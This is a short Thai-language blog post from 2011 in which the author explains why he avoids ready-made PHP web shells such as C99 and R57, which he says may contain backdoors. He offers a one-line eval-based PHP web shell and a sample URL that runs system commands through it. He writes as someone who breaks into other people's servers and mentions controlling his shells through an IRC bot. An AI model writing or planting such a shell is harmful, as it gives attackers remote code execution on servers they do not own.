หน้าเว็บ

วันอังคารที่ 27 ธันวาคม พ.ศ. 2554

ทำไมผมไม่ใช้ Shell สำเร็จรูป ( C99, R57 )


       

          ทำไมผมไม่ใช้ php shell สำเร็จรูปที่มีแจกใน internet ทั่วไปเช่นพวก c99,r57 ที่โด่งดัง (รึเปล่า) เหตุเพราะว่าในนั้นอาจจะยัดโค้ด backdoor ไว้ก็ได้ อย่างเวลาที่ผมเข้าไปในหอยของหรั่ง mbam ของผมมักจะเตือนบล๊อก ip แปลกๆตลอด
          ผมจึงคิดว่าแม่งไม่ปลอดภัยแล้วล่ะสำหรับตัวผม จึงได้ศึกษาการเขียน php shell จากใน irc ได้โค้ดมาสั้นๆก็สามารถทำอะไรหลากหลายอย่างได้เหมือน c99 ไม่แพ้กัน เพียงเพราะ c99 จะมี user interface ที่งามหน้ากว่าเท่านั้น ส่วนข้างในก็จะเป็นโค้ดยาวๆอย่างที่หลายๆคนเคยแงะนั้นเอง

<?php @eval($_GET['cmd']);die; ?>


          จากโค้ดข้างบนก็สามารถทำได้ทุกอย่างไม่แพ้กับ c99 เลยนะครับรูปแบบการใช้งานก็จะเป็นแบบนี้นะ..

http://localhost/shell.php?cmd=system('ipconfig');

          บทความนี้เป็นพื้นฐานของการใช้ php shell นะครับ ส่วนท่านที่หลงเข้ามาอ่านคงจะรู้เรื่องและคุ้นเคยกันอยู่แล้วคงไม่ต้องพูดอะไรมาก อิอิ ส่วนผมคงไม่ได้นั่งพิมพ์แบบนี้หรอกครับ shell ผมไม่ใช่โค้ดนี้
แน่นอนและการควบคุมผมเขียน IRC Bot ไว้ควบคุม PHP Shell ปลอดภัยกว่าสะดวกกว่า ได้เรียนรู้ภาษาอีกด้วย เป็นประโยชน์ครับ

IRC Bot Control shell.php [ Remote Code Execution ]

4 ความคิดเห็น: